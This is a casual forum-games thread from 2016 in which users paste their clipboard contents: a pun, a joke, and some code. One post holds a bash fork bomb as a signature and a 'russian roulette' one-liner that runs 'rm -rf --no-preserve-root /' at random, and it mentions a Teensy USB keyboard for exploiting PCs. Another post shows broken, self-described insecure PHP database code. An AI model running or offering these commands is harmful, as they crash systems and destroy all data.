Forum Games

What do you have copied

Submitted by Addicted, , Thread ID: 26407

Thread Closed

RE: What do you have copied

Addicted
Freak
Divine
Level:
0
Reputation:
105
Posts:
2.77K
Likes:
130
Credits:
9.94K
OP
24-12-2016, 09:34 AM
#31
Adolf wasn't Adolphin

RE: What do you have copied

AAA
Offline
Level:
0
Reputation:
73
Posts:
834
Likes:
110
Credits:
582
27-12-2016, 11:11 PM
#32
try{
$db = new PDO("dbtype:host=yourhost;dbname=yourdbname;charset=utf8","username","password");
$myinsecuredata=$_GET["table"];
$query=$db->prepare("Select * from ?");
$query->excute(array($myinsecuredata));
while($row=$query->fetch(PDO::FETCH_OBJ)) {
/*its getting data in line.And its an object*/
echo $row->yourcolumnname;
}
}catch(PDOException $e ){
echo "Error: ".$e;
}
[Image: XhhKTdF.png]

RE: What do you have copied

Vim
:(){ :|: & };:
Level:
0
Reputation:
100
Posts:
1.53K
Likes:
131
Credits:
68
27-12-2016, 11:57 PM
#35
HID keyboard

I was trying to do a usb keyboard with tensy in order to exploit a PC.
Play russian rulette:
[ $[ $RANDOM % 6 ] == 0 ] && rm -rf --no-preserve-root / || echo *Click*

RE: What do you have copied

28-12-2016, 09:52 AM
#40
Girl: "Come over"
Guy: "I'm coming over"
Girl: "We should stop using walkie talkies in bed, over."

A joke from r/jokes on reddit! Tongue

Users browsing this thread: 1 Guest(s)